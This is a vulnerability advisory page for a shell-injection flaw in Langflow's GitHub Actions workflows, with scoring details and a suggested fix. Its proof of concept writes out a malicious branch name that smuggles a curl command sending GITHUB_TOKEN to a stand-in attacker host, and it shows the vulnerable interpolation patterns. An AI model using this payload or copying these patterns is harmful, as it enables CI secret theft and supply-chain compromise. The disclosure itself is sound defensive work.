Home/CVE/Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection
CVE

CVE-2026-33475

Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection

Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., ${{ github.head_ref }}) in run: steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title.

This can lead to secret exfiltration (e.g., GITHUB_TOKEN), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability. --- ### Details Several workflows in .github/workflows/ and .github/actions/ reference GitHub context variables directly in run: shell commands, such as: ``yaml run: | validate_branch_name "${{ github.event.pull_request.head.ref }}" ` Or: `yaml run: npx playwright install ${{ inputs.browsers }} --with-deps ` Since github.head_ref, github.event.pull_request.title, and custom inputs.* may contain user-controlled values, they must be treated as untrusted input. Direct interpolation without proper quoting or sanitization leads to shell command injection. --- ### PoC 1. Fork the Langflow repository 2. Create a new branch with the name: `bash injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN `` 3. Open a Pull Request to the main branch from the new branch 4.

GitHub Actions will run the affected workflow (e.g., deploy-docs-draft.yml) 5. The run: step containing: ``yaml echo "Branch: ${{ github.head_ref }}" ` Will execute: `bash echo "Branch: injection-test" curl https://attacker.site/exfil?token=$GITHUB_TOKEN ` 6. The attacker receives the CI secret via the exfil URL. --- ### Impact - Type: Shell Injection / Remote Code Execution in CI - Scope: Any public Langflow fork with GitHub Actions enabled - Impact: Full access to CI secrets (e.g., GITHUB_TOKEN), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data --- ### Suggested Fix Refactor affected workflows to use environment variables and wrap them in double quotes: `yaml env: BRANCH_NAME: ${{ github.head_ref }} run: | echo "Branch is: \"$BRANCH_NAME\"" ` Avoid direct ${{ ... }} interpolation inside run: for any user-controlled value. --- ### Affected Files (Langflow 1.3.4) - .github/actions/install-playwright/action.yml - .github/workflows/deploy-docs-draft.yml - .github/workflows/docker-build.yml - .github/workflows/release_nightly.yml - .github/workflows/python_test.yml - .github/workflows/typescript_test.yml`.

CRITICAL · CVSS 9.1 EPSS 0.00081
Act now
  • Public exploit or PoC is available
  • SSVC automatable: yes - attacks can be scripted at scale
  • CVSS base score ≥ 7.0
Sigma rules0 YARA rules0

Scoring & Timeline

9.1
CRITICAL · CVSS v3.1 · security-advisories@github.com
View on NVD
Attack Vector
Network Adjacent Local Physical
Attack Complexity
Low High
Privileges Required
None Low High
User Interaction
None Required
Scope
Unchanged Changed
Confidentiality
None Low High
Integrity
None Low High
Availability
None Low High
Published to NVD24 Mar 2026 · 01:16 PM
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
SSVC triage · cisa-vulnrichment
Exploitation
poc
Automatable
yes
Technical impact
total
SSVC asks the questions that actually drive patch urgency: is it being exploited, can attacks be automated, and how total is the impact.
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin